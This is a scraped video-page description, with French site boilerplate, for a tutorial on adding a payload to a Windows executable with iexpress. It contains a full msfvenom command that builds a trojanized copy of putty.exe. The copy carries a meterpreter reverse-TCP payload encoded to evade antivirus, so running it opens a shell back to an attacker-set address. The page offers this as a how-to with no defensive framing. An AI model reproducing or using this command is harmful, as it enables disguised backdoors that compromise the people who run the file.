Add Payload to Executable (Windows)

Publié le: 01 avril 2022
sur la chaîne: CodeOnBy
3,461
50

In this video we'll see how to add a payload to an executable on Windows using iexpress. This will create a win32 self extracting package.
You can use this method to combine two executables or add a Python script to run parallel to the executable itself.

To create standalone Python executables:
   • Convert Python 3 to Executable using PyIns...  
For Python client/server sciprts:
https://codeonbyte.com/2019/12/23/pyt...

Alternatively, this can be done with metasploit using the following command under Linux:
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=ip.address lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe


Sur cette page du site, vous pouvez voir la vidéo en ligne Add Payload to Executable (Windows) durée heure minute seconde en bonne qualité , qui a été Téléchargé par l'utilisateur CodeOnBy 01 avril 2022, Partagez le lien avec vos amis et connaissances, sur youtube cette vidéo a déjà été regardée 3,461 fois et il a aimé 50 téléspectateurs. Bon visionnage!